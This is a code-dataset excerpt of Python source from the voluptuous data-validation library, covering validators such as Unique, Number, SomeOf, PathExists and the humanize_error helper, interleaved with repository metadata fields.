>>> s = Schema(Unique())
>>> s([])
[]
>>> s([1, 2])
[1, 2]
>>> with raises(Invalid, 'contains duplicate items: [1]'):
... s([1, 1, 2])
>>> with raises(Invalid, "contains duplicate items: ['one']"):
... s(['one', 'two', 'one'])
>>> with raises(Invalid, regex="^contains unhashable elements: "):
... s([set([1, 2]), set([3, 4])])
>>> s('abc')
'abc'
>>> with raises(Invalid, regex="^contains duplicate items: "):
... s('aabbc')
"""
def __init__(self, msg=None):
self.msg = msg
def __call__(self, v):
try:
set_v = set(v)
except TypeError as e:
raise TypeInvalid(
self.msg or 'contains unhashable elements: {0}'.format(e))
if len(set_v) != len(v):
seen = set()
dupes = list(set(x for x in v if x in seen or seen.add(x)))
raise Invalid(
self.msg or 'contains duplicate items: {0}'.format(dupes))
return v
def __repr__(self):
return 'Unique()'
class Equal(object):
"""Ensure that value matches target.
>>> s = Schema(Equal(1))
>>> s(1)
1
>>> with raises(Invalid):
... s(2)
Validators are not supported, match must be exact:
>>> s = Schema(Equal(str))
>>> with raises(Invalid):
... s('foo')
"""
def __init__(self, target, msg=None):
self.target = target
self.msg = msg
def __call__(self, v):
if v != self.target:
raise Invalid(self.msg or 'Values are not equal: value:{} != target:{}'.format(v, self.target))
return v
def __repr__(self):
return 'Equal({})'.format(self.target)
class Unordered(object):
"""Ensures sequence contains values in unspecified order.
>>> s = Schema(Unordered([2, 1]))
>>> s([2, 1])
[2, 1]
>>> s([1, 2])
[1, 2]
>>> s = Schema(Unordered([str, int]))
>>> s(['foo', 1])
['foo', 1]
>>> s([1, 'foo'])
[1, 'foo']
"""
def __init__(self, validators, msg=None, **kwargs):
self.validators = validators
self.msg = msg
self._schemas = [Schema(val, **kwargs) for val in validators]
def __call__(self, v):
if not isinstance(v, (list, tuple)):
raise Invalid(self.msg or 'Value {} is not sequence!'.format(v))
if len(v) != len(self._schemas):
raise Invalid(self.msg or 'List lengths differ, value:{} != target:{}'.format(len(v), len(self._schemas)))
consumed = set()
missing = []
for index, value in enumerate(v):
found = False
for i, s in enumerate(self._schemas):
if i in consumed:
continue
try:
s(value)
except Invalid:
pass
else:
found = True
consumed.add(i)
break
if not found:
missing.append((index, value))
if len(missing) == 1:
el = missing[0]
raise Invalid(self.msg or 'Element #{} ({}) is not valid against any validator'.format(el[0], el[1]))
elif missing:
raise MultipleInvalid([Invalid(self.msg or 'Element #{} ({}) is not valid against any validator'.format(
el[0], el[1])) for el in missing])
return v
def __repr__(self):
return 'Unordered([{}])'.format(", ".join(repr(v) for v in self.validators))
class Number(object):
"""
Verify the number of digits that are present in the number(Precision),
and the decimal places(Scale)
:raises Invalid: If the value does not match the provided Precision and Scale.
>>> schema = Schema(Number(precision=6, scale=2))
>>> schema('1234.01')
'1234.01'
>>> schema = Schema(Number(precision=6, scale=2, yield_decimal=True))
>>> schema('1234.01')
Decimal('1234.01')
"""
def __init__(self, precision=None, scale=None, msg=None, yield_decimal=False):
self.precision = precision
self.scale = scale
self.msg = msg
self.yield_decimal = yield_decimal
def __call__(self, v):
"""
:param v: is a number enclosed with string
:return: Decimal number
"""
precision, scale, decimal_num = self._get_precision_scale(v)
if self.precision is not None and self.scale is not None and precision != self.precision\
and scale != self.scale:
raise Invalid(self.msg or "Precision must be equal to %s, and Scale must be equal to %s" % (self.precision,
self.scale))
else:
if self.precision is not None and precision != self.precision:
raise Invalid(self.msg or "Precision must be equal to %s" % self.precision)
if self.scale is not None and scale != self.scale:
raise Invalid(self.msg or "Scale must be equal to %s" % self.scale)
if self.yield_decimal:
return decimal_num
else:
return v
def __repr__(self):
return ('Number(precision=%s, scale=%s, msg=%s)' % (self.precision, self.scale, self.msg))
def _get_precision_scale(self, number):
"""
:param number:
:return: tuple(precision, scale, decimal_number)
"""
try:
decimal_num = Decimal(number)
except InvalidOperation:
raise Invalid(self.msg or 'Value must be a number enclosed with string')
return (len(decimal_num.as_tuple().digits), -(decimal_num.as_tuple().exponent), decimal_num)
class SomeOf(_WithSubValidators):
"""Value must pass at least some validations, determined by the given parameter.
Optionally, number of passed validations can be capped.
The output of each validator is passed as input to the next.
:param min_valid: Minimum number of valid schemas.
:param validators: a list of schemas or validators to match input against
:param max_valid: Maximum number of valid schemas.
:param msg: Message to deliver to user if validation fails.
:param kwargs: All other keyword arguments are passed to the sub-Schema constructors.
:raises NotEnoughValid: if the minimum number of validations isn't met
:raises TooManyValid: if the more validations than the given amount is met
>>> validate = Schema(SomeOf(min_valid=2, validators=[Range(1, 5), Any(float, int), 6.6]))
>>> validate(6.6)
6.6
>>> validate(3)
3
>>> with raises(MultipleInvalid, 'value must be at most 5, not a valid value'):
... validate(6.2)
"""
def __init__(self, validators, min_valid=None, max_valid=None, **kwargs):
assert min_valid is not None or max_valid is not None, \
'when using "%s" you should specify at least one of min_valid and max_valid' % (type(self).__name__,)
self.min_valid = min_valid or 0
self.max_valid = max_valid or len(validators)
super(SomeOf, self).__init__(*validators, **kwargs)
def _exec(self, funcs, v, path=None):
errors = []
funcs = list(funcs)
for func in funcs:
try:
if path is None:
v = func(v)
else:
v = func(path, v)
except Invalid as e:
errors.append(e)
passed_count = len(funcs) - len(errors)
if self.min_valid <= passed_count <= self.max_valid:
return v
msg = self.msg
if not msg:
msg = ', '.join(map(str, errors))
if passed_count > self.max_valid:
raise TooManyValid(msg)
raise NotEnoughValid(msg)
def __repr__(self):
return 'SomeOf(min_valid=%s, validators=[%s], max_valid=%s, msg=%r)' % (
self.min_valid, ", ".join(repr(v) for v in self.validators), self.max_valid, self.msg)
|
alecthomas/voluptuous | voluptuous/validators.py | PathExists | python | def PathExists(v):
try:
if v:
v = str(v)
return os.path.exists(v)
else:
raise PathInvalid("Not a Path")
except TypeError:
raise PathInvalid("Not a Path") | Verify the path exists, regardless of its type.
>>> os.path.basename(PathExists()(__file__)).startswith('validators.py')
True
>>> with raises(Invalid, 'path does not exist'):
... PathExists()("random_filename_goes_here.py")
>>> with raises(PathInvalid, 'Not a Path'):
... PathExists()(None) | train | https://github.com/alecthomas/voluptuous/blob/36c8c11e2b7eb402c24866fa558473661ede9403/voluptuous/validators.py#L471-L488 | null | import os
import re
import datetime
import sys
from functools import wraps
from decimal import Decimal, InvalidOperation
from voluptuous.schema_builder import Schema, raises, message
from voluptuous.error import (MultipleInvalid, CoerceInvalid, TrueInvalid, FalseInvalid, BooleanInvalid, Invalid,
AnyInvalid, AllInvalid, MatchInvalid, UrlInvalid, EmailInvalid, FileInvalid, DirInvalid,
RangeInvalid, PathInvalid, ExactSequenceInvalid, LengthInvalid, DatetimeInvalid,
DateInvalid, InInvalid, TypeInvalid, NotInInvalid, ContainsInvalid, NotEnoughValid,
TooManyValid)
if sys.version_info >= (3,):
import urllib.parse as urlparse
basestring = str
else:
import urlparse
# Taken from https://github.com/kvesteri/validators/blob/master/validators/email.py
USER_REGEX = re.compile(
# dot-atom
r"(^[-!#$%&'*+/=?^_`{}|~0-9A-Z]+"
r"(\.[-!#$%&'*+/=?^_`{}|~0-9A-Z]+)*$"
# quoted-string
r'|^"([\001-\010\013\014\016-\037!#-\[\]-\177]|'
r"""\\[\001-\011\013\014\016-\177])*"$)""",
re.IGNORECASE
)
DOMAIN_REGEX = re.compile(
# domain
r'(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+'
r'(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?$)'
# literal form, ipv4 address (SMTP 4.1.3)
r'|^\[(25[0-5]|2[0-4]\d|[0-1]?\d?\d)'
r'(\.(25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3}\]$',
re.IGNORECASE)
__author__ = 'tusharmakkar08'
def truth(f):
"""Convenience decorator to convert truth functions into validators.
>>> @truth
... def isdir(v):
... return os.path.isdir(v)
>>> validate = Schema(isdir)
>>> validate('/')
'/'
>>> with raises(MultipleInvalid, 'not a valid value'):
... validate('/notavaliddir')
"""
@wraps(f)
def check(v):
t = f(v)
if not t:
raise ValueError
return v
return check
class Coerce(object):
"""Coerce a value to a type.
If the type constructor throws a ValueError or TypeError, the value
will be marked as Invalid.
Default behavior:
>>> validate = Schema(Coerce(int))
>>> with raises(MultipleInvalid, 'expected int'):
... validate(None)
>>> with raises(MultipleInvalid, 'expected int'):
... validate('foo')
With custom message:
>>> validate = Schema(Coerce(int, "moo"))
>>> with raises(MultipleInvalid, 'moo'):
... validate('foo')
"""
def __init__(self, type, msg=None):
self.type = type
self.msg = msg
self.type_name = type.__name__
def __call__(self, v):
try:
return self.type(v)
except (ValueError, TypeError, InvalidOperation):
msg = self.msg or ('expected %s' % self.type_name)
raise CoerceInvalid(msg)
def __repr__(self):
return 'Coerce(%s, msg=%r)' % (self.type_name, self.msg)
@message('value was not true', cls=TrueInvalid)
@truth
def IsTrue(v):
"""Assert that a value is true, in the Python sense.
>>> validate = Schema(IsTrue())
"In the Python sense" means that implicitly false values, such as empty
lists, dictionaries, etc. are treated as "false":
>>> with raises(MultipleInvalid, "value was not true"):
... validate([])
>>> validate([1])
[1]
>>> with raises(MultipleInvalid, "value was not true"):
... validate(False)
...and so on.
>>> try:
... validate([])
... except MultipleInvalid as e:
... assert isinstance(e.errors[0], TrueInvalid)
"""
return v
@message('value was not false', cls=FalseInvalid)
def IsFalse(v):
"""Assert that a value is false, in the Python sense.
(see :func:`IsTrue` for more detail)
>>> validate = Schema(IsFalse())
>>> validate([])
[]
>>> with raises(MultipleInvalid, "value was not false"):
... validate(True)
>>> try:
... validate(True)
... except MultipleInvalid as e:
... assert isinstance(e.errors[0], FalseInvalid)
"""
if v:
raise ValueError
return v
@message('expected boolean', cls=BooleanInvalid)
def Boolean(v):
"""Convert human-readable boolean values to a bool.
Accepted values are 1, true, yes, on, enable, and their negatives.
Non-string values are cast to bool.
>>> validate = Schema(Boolean())
>>> validate(True)
True
>>> validate("1")
True
>>> validate("0")
False
>>> with raises(MultipleInvalid, "expected boolean"):
... validate('moo')
>>> try:
... validate('moo')
... except MultipleInvalid as e:
... assert isinstance(e.errors[0], BooleanInvalid)
"""
if isinstance(v, basestring):
v = v.lower()
if v in ('1', 'true', 'yes', 'on', 'enable'):
return True
if v in ('0', 'false', 'no', 'off', 'disable'):
return False
raise ValueError
return bool(v)
class _WithSubValidators(object):
"""Base class for validators that use sub-validators.
Special class to use as a parent class for validators using sub-validators.
This class provides the `__voluptuous_compile__` method so the
sub-validators are compiled by the parent `Schema`.
"""
def __init__(self, *validators, **kwargs):
self.validators = validators
self.msg = kwargs.pop('msg', None)
self.required = kwargs.pop('required', False)
def __voluptuous_compile__(self, schema):
self._compiled = []
for v in self.validators:
schema.required = self.required
self._compiled.append(schema._compile(v))
return self._run
def _run(self, path, value):
return self._exec(self._compiled, value, path)
def __call__(self, v):
return self._exec((Schema(val) for val in self.validators), v)
def __repr__(self):
return '%s(%s, msg=%r)' % (
self.__class__.__name__,
", ".join(repr(v) for v in self.validators),
self.msg
)
class Any(_WithSubValidators):
"""Use the first validated value.
:param msg: Message to deliver to user if validation fails.
:param kwargs: All other keyword arguments are passed to the sub-Schema constructors.
:returns: Return value of the first validator that passes.
>>> validate = Schema(Any('true', 'false',
... All(Any(int, bool), Coerce(bool))))
>>> validate('true')
'true'
>>> validate(1)
True
>>> with raises(MultipleInvalid, "not a valid value"):
... validate('moo')
msg argument is used
>>> validate = Schema(Any(1, 2, 3, msg="Expected 1 2 or 3"))
>>> validate(1)
1
>>> with raises(MultipleInvalid, "Expected 1 2 or 3"):
... validate(4)
"""
def _exec(self, funcs, v, path=None):
error = None
for func in funcs:
try:
if path is None:
return func(v)
else:
return func(path, v)
except Invalid as e:
if error is None or len(e.path) > len(error.path):
error = e
else:
if error:
raise error if self.msg is None else AnyInvalid(
self.msg, path=path)
raise AnyInvalid(self.msg or 'no valid value found',
path=path)
# Convenience alias
Or = Any
class All(_WithSubValidators):
"""Value must pass all validators.
The output of each validator is passed as input to the next.
:param msg: Message to deliver to user if validation fails.
:param kwargs: All other keyword arguments are passed to the sub-Schema constructors.
>>> validate = Schema(All('10', Coerce(int)))
>>> validate('10')
10
"""
def _exec(self, funcs, v, path=None):
try:
for func in funcs:
if path is None:
v = func(v)
else:
v = func(path, v)
except Invalid as e:
raise e if self.msg is None else AllInvalid(self.msg, path=path)
return v
# Convenience alias
And = All
class Match(object):
"""Value must be a string that matches the regular expression.
>>> validate = Schema(Match(r'^0x[A-F0-9]+$'))
>>> validate('0x123EF4')
'0x123EF4'
>>> with raises(MultipleInvalid, "does not match regular expression"):
... validate('123EF4')
>>> with raises(MultipleInvalid, 'expected string or buffer'):
... validate(123)
Pattern may also be a _compiled regular expression:
>>> validate = Schema(Match(re.compile(r'0x[A-F0-9]+', re.I)))
>>> validate('0x123ef4')
'0x123ef4'
"""
def __init__(self, pattern, msg=None):
if isinstance(pattern, basestring):
pattern = re.compile(pattern)
self.pattern = pattern
self.msg = msg
def __call__(self, v):
try:
match = self.pattern.match(v)
except TypeError:
raise MatchInvalid("expected string or buffer")
if not match:
raise MatchInvalid(self.msg or 'does not match regular expression')
return v
def __repr__(self):
return 'Match(%r, msg=%r)' % (self.pattern.pattern, self.msg)
class Replace(object):
"""Regex substitution.
>>> validate = Schema(All(Replace('you', 'I'),
... Replace('hello', 'goodbye')))
>>> validate('you say hello')
'I say goodbye'
"""
def __init__(self, pattern, substitution, msg=None):
if isinstance(pattern, basestring):
pattern = re.compile(pattern)
self.pattern = pattern
self.substitution = substitution
self.msg = msg
def __call__(self, v):
return self.pattern.sub(self.substitution, v)
def __repr__(self):
return 'Replace(%r, %r, msg=%r)' % (self.pattern.pattern,
self.substitution,
self.msg)
def _url_validation(v):
parsed = urlparse.urlparse(v)
if not parsed.scheme or not parsed.netloc:
raise UrlInvalid("must have a URL scheme and host")
return parsed
@message('expected an Email', cls=EmailInvalid)
def Email(v):
"""Verify that the value is an Email or not.
>>> s = Schema(Email())
>>> with raises(MultipleInvalid, 'expected an Email'):
... s("a.com")
>>> with raises(MultipleInvalid, 'expected an Email'):
... s("a@.com")
>>> with raises(MultipleInvalid, 'expected an Email'):
... s("a@.com")
>>> s('t@x.com')
't@x.com'
"""
try:
if not v or "@" not in v:
raise EmailInvalid("Invalid Email")
user_part, domain_part = v.rsplit('@', 1)
if not (USER_REGEX.match(user_part) and DOMAIN_REGEX.match(domain_part)):
raise EmailInvalid("Invalid Email")
return v
except:
raise ValueError
@message('expected a Fully qualified domain name URL', cls=UrlInvalid)
def FqdnUrl(v):
"""Verify that the value is a Fully qualified domain name URL.
>>> s = Schema(FqdnUrl())
>>> with raises(MultipleInvalid, 'expected a Fully qualified domain name URL'):
... s("http://localhost/")
>>> s('http://w3.org')
'http://w3.org'
"""
try:
parsed_url = _url_validation(v)
if "." not in parsed_url.netloc:
raise UrlInvalid("must have a domain name in URL")
return v
except:
raise ValueError
@message('expected a URL', cls=UrlInvalid)
def Url(v):
"""Verify that the value is a URL.
>>> s = Schema(Url())
>>> with raises(MultipleInvalid, 'expected a URL'):
... s(1)
>>> s('http://w3.org')
'http://w3.org'
"""
try:
_url_validation(v)
return v
except:
raise ValueError
@message('not a file', cls=FileInvalid)
@truth
def IsFile(v):
"""Verify the file exists.
>>> os.path.basename(IsFile()(__file__)).startswith('validators.py')
True
>>> with raises(FileInvalid, 'not a file'):
... IsFile()("random_filename_goes_here.py")
>>> with raises(FileInvalid, 'Not a file'):
... IsFile()(None)
"""
try:
if v:
v = str(v)
return os.path.isfile(v)
else:
raise FileInvalid('Not a file')
except TypeError:
raise FileInvalid('Not a file')
@message('not a directory', cls=DirInvalid)
@truth
def IsDir(v):
"""Verify the directory exists.
>>> IsDir()('/')
'/'
>>> with raises(DirInvalid, 'Not a directory'):
... IsDir()(None)
"""
try:
if v:
v = str(v)
return os.path.isdir(v)
else:
raise DirInvalid("Not a directory")
except TypeError:
raise DirInvalid("Not a directory")
@message('path does not exist', cls=PathInvalid)
@truth
def Maybe(validator, msg=None):
"""Validate that the object matches given validator or is None.
:raises Invalid: if the value does not match the given validator and is not
None
>>> s = Schema(Maybe(int))
>>> s(10)
10
>>> with raises(Invalid):
... s("string")
"""
return Any(None, validator, msg=msg)
class Range(object):
"""Limit a value to a range.
Either min or max may be omitted.
Either min or max can be excluded from the range of accepted values.
:raises Invalid: If the value is outside the range.
>>> s = Schema(Range(min=1, max=10, min_included=False))
>>> s(5)
5
>>> s(10)
10
>>> with raises(MultipleInvalid, 'value must be at most 10'):
... s(20)
>>> with raises(MultipleInvalid, 'value must be higher than 1'):
... s(1)
>>> with raises(MultipleInvalid, 'value must be lower than 10'):
... Schema(Range(max=10, max_included=False))(20)
"""
def __init__(self, min=None, max=None, min_included=True,
max_included=True, msg=None):
self.min = min
self.max = max
self.min_included = min_included
self.max_included = max_included
self.msg = msg
def __call__(self, v):
if self.min_included:
if self.min is not None and not v >= self.min:
raise RangeInvalid(
self.msg or 'value must be at least %s' % self.min)
else:
if self.min is not None and not v > self.min:
raise RangeInvalid(
self.msg or 'value must be higher than %s' % self.min)
if self.max_included:
if self.max is not None and not v <= self.max:
raise RangeInvalid(
self.msg or 'value must be at most %s' % self.max)
else:
if self.max is not None and not v < self.max:
raise RangeInvalid(
self.msg or 'value must be lower than %s' % self.max)
return v
def __repr__(self):
return ('Range(min=%r, max=%r, min_included=%r,'
' max_included=%r, msg=%r)' % (self.min, self.max,
self.min_included,
self.max_included,
self.msg))
class Clamp(object):
"""Clamp a value to a range.
Either min or max may be omitted.
>>> s = Schema(Clamp(min=0, max=1))
>>> s(0.5)
0.5
>>> s(5)
1
>>> s(-1)
0
"""
def __init__(self, min=None, max=None, msg=None):
self.min = min
self.max = max
self.msg = msg
def __call__(self, v):
if self.min is not None and v < self.min:
v = self.min
if self.max is not None and v > self.max:
v = self.max
return v
def __repr__(self):
return 'Clamp(min=%s, max=%s)' % (self.min, self.max)
class Length(object):
"""The length of a value must be in a certain range."""
def __init__(self, min=None, max=None, msg=None):
self.min = min
self.max = max
self.msg = msg
def __call__(self, v):
if self.min is not None and len(v) < self.min:
raise LengthInvalid(
self.msg or 'length of value must be at least %s' % self.min)
if self.max is not None and len(v) > self.max:
raise LengthInvalid(
self.msg or 'length of value must be at most %s' % self.max)
return v
def __repr__(self):
return 'Length(min=%s, max=%s)' % (self.min, self.max)
class Datetime(object):
"""Validate that the value matches the datetime format."""
DEFAULT_FORMAT = '%Y-%m-%dT%H:%M:%S.%fZ'
def __init__(self, format=None, msg=None):
self.format = format or self.DEFAULT_FORMAT
self.msg = msg
def __call__(self, v):
try:
datetime.datetime.strptime(v, self.format)
except (TypeError, ValueError):
raise DatetimeInvalid(
self.msg or 'value does not match'
' expected format %s' % self.format)
return v
def __repr__(self):
return 'Datetime(format=%s)' % self.format
class Date(Datetime):
"""Validate that the value matches the date format."""
DEFAULT_FORMAT = '%Y-%m-%d'
def __call__(self, v):
try:
datetime.datetime.strptime(v, self.format)
except (TypeError, ValueError):
raise DateInvalid(
self.msg or 'value does not match'
' expected format %s' % self.format)
return v
def __repr__(self):
return 'Date(format=%s)' % self.format
class In(object):
"""Validate that a value is in a collection."""
def __init__(self, container, msg=None):
self.container = container
self.msg = msg
def __call__(self, v):
try:
check = v not in self.container
except TypeError:
check = True
if check:
raise InInvalid(self.msg or 'value is not allowed')
return v
def __repr__(self):
return 'In(%s)' % (self.container,)
class NotIn(object):
"""Validate that a value is not in a collection."""
def __init__(self, container, msg=None):
self.container = container
self.msg = msg
def __call__(self, v):
try:
check = v in self.container
except TypeError:
check = True
if check:
raise NotInInvalid(self.msg or 'value is not allowed')
return v
def __repr__(self):
return 'NotIn(%s)' % (self.container,)
class Contains(object):
"""Validate that the given schema element is in the sequence being validated.
>>> s = Contains(1)
>>> s([3, 2, 1])
[3, 2, 1]
>>> with raises(ContainsInvalid, 'value is not allowed'):
... s([3, 2])
"""
def __init__(self, item, msg=None):
self.item = item
self.msg = msg
def __call__(self, v):
try:
check = self.item not in v
except TypeError:
check = True
if check:
raise ContainsInvalid(self.msg or 'value is not allowed')
return v
def __repr__(self):
return 'Contains(%s)' % (self.item,)
class ExactSequence(object):
"""Matches each element in a sequence against the corresponding element in
the validators.
:param msg: Message to deliver to user if validation fails.
:param kwargs: All other keyword arguments are passed to the sub-Schema
constructors.
>>> from voluptuous import Schema, ExactSequence
>>> validate = Schema(ExactSequence([str, int, list, list]))
>>> validate(['hourly_report', 10, [], []])
['hourly_report', 10, [], []]
>>> validate(('hourly_report', 10, [], []))
('hourly_report', 10, [], [])
"""
def __init__(self, validators, **kwargs):
self.validators = validators
self.msg = kwargs.pop('msg', None)
self._schemas = [Schema(val, **kwargs) for val in validators]
def __call__(self, v):
if not isinstance(v, (list, tuple)) or len(v) != len(self._schemas):
raise ExactSequenceInvalid(self.msg)
try:
v = type(v)(schema(x) for x, schema in zip(v, self._schemas))
except Invalid as e:
raise e if self.msg is None else ExactSequenceInvalid(self.msg)
return v
def __repr__(self):
return 'ExactSequence([%s])' % (", ".join(repr(v)
for v in self.validators))
class Unique(object):
"""Ensure an iterable does not contain duplicate items.
Only iterables convertable to a set are supported (native types and
objects with correct __eq__).
JSON does not support set, so they need to be presented as arrays.
Unique allows ensuring that such array does not contain dupes.
>>> s = Schema(Unique())
>>> s([])
[]
>>> s([1, 2])
[1, 2]
>>> with raises(Invalid, 'contains duplicate items: [1]'):
... s([1, 1, 2])
>>> with raises(Invalid, "contains duplicate items: ['one']"):
... s(['one', 'two', 'one'])
>>> with raises(Invalid, regex="^contains unhashable elements: "):
... s([set([1, 2]), set([3, 4])])
>>> s('abc')
'abc'
>>> with raises(Invalid, regex="^contains duplicate items: "):
... s('aabbc')
"""
def __init__(self, msg=None):
self.msg = msg
def __call__(self, v):
try:
set_v = set(v)
except TypeError as e:
raise TypeInvalid(
self.msg or 'contains unhashable elements: {0}'.format(e))
if len(set_v) != len(v):
seen = set()
dupes = list(set(x for x in v if x in seen or seen.add(x)))
raise Invalid(
self.msg or 'contains duplicate items: {0}'.format(dupes))
return v
def __repr__(self):
return 'Unique()'
class Equal(object):
"""Ensure that value matches target.
>>> s = Schema(Equal(1))
>>> s(1)
1
>>> with raises(Invalid):
... s(2)
Validators are not supported, match must be exact:
>>> s = Schema(Equal(str))
>>> with raises(Invalid):
... s('foo')
"""
def __init__(self, target, msg=None):
self.target = target
self.msg = msg
def __call__(self, v):
if v != self.target:
raise Invalid(self.msg or 'Values are not equal: value:{} != target:{}'.format(v, self.target))
return v
def __repr__(self):
return 'Equal({})'.format(self.target)
class Unordered(object):
"""Ensures sequence contains values in unspecified order.
>>> s = Schema(Unordered([2, 1]))
>>> s([2, 1])
[2, 1]
>>> s([1, 2])
[1, 2]
>>> s = Schema(Unordered([str, int]))
>>> s(['foo', 1])
['foo', 1]
>>> s([1, 'foo'])
[1, 'foo']
"""
def __init__(self, validators, msg=None, **kwargs):
self.validators = validators
self.msg = msg
self._schemas = [Schema(val, **kwargs) for val in validators]
def __call__(self, v):
if not isinstance(v, (list, tuple)):
raise Invalid(self.msg or 'Value {} is not sequence!'.format(v))
if len(v) != len(self._schemas):
raise Invalid(self.msg or 'List lengths differ, value:{} != target:{}'.format(len(v), len(self._schemas)))
consumed = set()
missing = []
for index, value in enumerate(v):
found = False
for i, s in enumerate(self._schemas):
if i in consumed:
continue
try:
s(value)
except Invalid:
pass
else:
found = True
consumed.add(i)
break
if not found:
missing.append((index, value))
if len(missing) == 1:
el = missing[0]
raise Invalid(self.msg or 'Element #{} ({}) is not valid against any validator'.format(el[0], el[1]))
elif missing:
raise MultipleInvalid([Invalid(self.msg or 'Element #{} ({}) is not valid against any validator'.format(
el[0], el[1])) for el in missing])
return v
def __repr__(self):
return 'Unordered([{}])'.format(", ".join(repr(v) for v in self.validators))
class Number(object):
"""
Verify the number of digits that are present in the number(Precision),
and the decimal places(Scale)
:raises Invalid: If the value does not match the provided Precision and Scale.
>>> schema = Schema(Number(precision=6, scale=2))
>>> schema('1234.01')
'1234.01'
>>> schema = Schema(Number(precision=6, scale=2, yield_decimal=True))
>>> schema('1234.01')
Decimal('1234.01')
"""
def __init__(self, precision=None, scale=None, msg=None, yield_decimal=False):
self.precision = precision
self.scale = scale
self.msg = msg
self.yield_decimal = yield_decimal
def __call__(self, v):
"""
:param v: is a number enclosed with string
:return: Decimal number
"""
precision, scale, decimal_num = self._get_precision_scale(v)
if self.precision is not None and self.scale is not None and precision != self.precision\
and scale != self.scale:
raise Invalid(self.msg or "Precision must be equal to %s, and Scale must be equal to %s" % (self.precision,
self.scale))
else:
if self.precision is not None and precision != self.precision:
raise Invalid(self.msg or "Precision must be equal to %s" % self.precision)
if self.scale is not None and scale != self.scale:
raise Invalid(self.msg or "Scale must be equal to %s" % self.scale)
if self.yield_decimal:
return decimal_num
else:
return v
def __repr__(self):
return ('Number(precision=%s, scale=%s, msg=%s)' % (self.precision, self.scale, self.msg))
def _get_precision_scale(self, number):
"""
:param number:
:return: tuple(precision, scale, decimal_number)
"""
try:
decimal_num = Decimal(number)
except InvalidOperation:
raise Invalid(self.msg or 'Value must be a number enclosed with string')
return (len(decimal_num.as_tuple().digits), -(decimal_num.as_tuple().exponent), decimal_num)
class SomeOf(_WithSubValidators):
"""Value must pass at least some validations, determined by the given parameter.
Optionally, number of passed validations can be capped.
The output of each validator is passed as input to the next.
:param min_valid: Minimum number of valid schemas.
:param validators: a list of schemas or validators to match input against
:param max_valid: Maximum number of valid schemas.
:param msg: Message to deliver to user if validation fails.
:param kwargs: All other keyword arguments are passed to the sub-Schema constructors.
:raises NotEnoughValid: if the minimum number of validations isn't met
:raises TooManyValid: if the more validations than the given amount is met
>>> validate = Schema(SomeOf(min_valid=2, validators=[Range(1, 5), Any(float, int), 6.6]))
>>> validate(6.6)
6.6
>>> validate(3)
3
>>> with raises(MultipleInvalid, 'value must be at most 5, not a valid value'):
... validate(6.2)
"""
def __init__(self, validators, min_valid=None, max_valid=None, **kwargs):
assert min_valid is not None or max_valid is not None, \
'when using "%s" you should specify at least one of min_valid and max_valid' % (type(self).__name__,)
self.min_valid = min_valid or 0
self.max_valid = max_valid or len(validators)
super(SomeOf, self).__init__(*validators, **kwargs)
def _exec(self, funcs, v, path=None):
errors = []
funcs = list(funcs)
for func in funcs:
try:
if path is None:
v = func(v)
else:
v = func(path, v)
except Invalid as e:
errors.append(e)
passed_count = len(funcs) - len(errors)
if self.min_valid <= passed_count <= self.max_valid:
return v
msg = self.msg
if not msg:
msg = ', '.join(map(str, errors))
if passed_count > self.max_valid:
raise TooManyValid(msg)
raise NotEnoughValid(msg)
def __repr__(self):
return 'SomeOf(min_valid=%s, validators=[%s], max_valid=%s, msg=%r)' % (
self.min_valid, ", ".join(repr(v) for v in self.validators), self.max_valid, self.msg)
|
alecthomas/voluptuous | voluptuous/validators.py | Number._get_precision_scale | python | def _get_precision_scale(self, number):
try:
decimal_num = Decimal(number)
except InvalidOperation:
raise Invalid(self.msg or 'Value must be a number enclosed with string')
return (len(decimal_num.as_tuple().digits), -(decimal_num.as_tuple().exponent), decimal_num) | :param number:
:return: tuple(precision, scale, decimal_number) | train | https://github.com/alecthomas/voluptuous/blob/36c8c11e2b7eb402c24866fa558473661ede9403/voluptuous/validators.py#L935-L945 | null | class Number(object):
"""
Verify the number of digits that are present in the number(Precision),
and the decimal places(Scale)
:raises Invalid: If the value does not match the provided Precision and Scale.
>>> schema = Schema(Number(precision=6, scale=2))
>>> schema('1234.01')
'1234.01'
>>> schema = Schema(Number(precision=6, scale=2, yield_decimal=True))
>>> schema('1234.01')
Decimal('1234.01')
"""
def __init__(self, precision=None, scale=None, msg=None, yield_decimal=False):
self.precision = precision
self.scale = scale
self.msg = msg
self.yield_decimal = yield_decimal
def __call__(self, v):
"""
:param v: is a number enclosed with string
:return: Decimal number
"""
precision, scale, decimal_num = self._get_precision_scale(v)
if self.precision is not None and self.scale is not None and precision != self.precision\
and scale != self.scale:
raise Invalid(self.msg or "Precision must be equal to %s, and Scale must be equal to %s" % (self.precision,
self.scale))
else:
if self.precision is not None and precision != self.precision:
raise Invalid(self.msg or "Precision must be equal to %s" % self.precision)
if self.scale is not None and scale != self.scale:
raise Invalid(self.msg or "Scale must be equal to %s" % self.scale)
if self.yield_decimal:
return decimal_num
else:
return v
def __repr__(self):
return ('Number(precision=%s, scale=%s, msg=%s)' % (self.precision, self.scale, self.msg))
|
alecthomas/voluptuous | voluptuous/humanize.py | humanize_error | python | def humanize_error(data, validation_error, max_sub_error_length=MAX_VALIDATION_ERROR_ITEM_LENGTH):
if isinstance(validation_error, MultipleInvalid):
return '\n'.join(sorted(
humanize_error(data, sub_error, max_sub_error_length)
for sub_error in validation_error.errors
))
else:
offending_item_summary = repr(_nested_getitem(data, validation_error.path))
if len(offending_item_summary) > max_sub_error_length:
offending_item_summary = offending_item_summary[:max_sub_error_length - 3] + '...'
return '%s. Got %s' % (validation_error, offending_item_summary) | Provide a more helpful + complete validation error message than that provided automatically
Invalid and MultipleInvalid do not include the offending value in error messages,
and MultipleInvalid.__str__ only provides the first error. | train | https://github.com/alecthomas/voluptuous/blob/36c8c11e2b7eb402c24866fa558473661ede9403/voluptuous/humanize.py#L19-L33 | [
"def _nested_getitem(data, path):\n for item_index in path:\n try:\n data = data[item_index]\n except (KeyError, IndexError, TypeError):\n # The index is not present in the dictionary, list or other\n # indexable or data is not subscriptable\n return None... | from voluptuous import Invalid, MultipleInvalid
from voluptuous.error import Error
MAX_VALIDATION_ERROR_ITEM_LENGTH = 500
def _nested_getitem(data, path):
for item_index in path:
try:
data = data[item_index]
except (KeyError, IndexError, TypeError):
# The index is not present in the dictionary, list or other
# indexable or data is not subscriptable
return None
return data
def validate_with_humanized_errors(data, schema, max_sub_error_length=MAX_VALIDATION_ERROR_ITEM_LENGTH):
try:
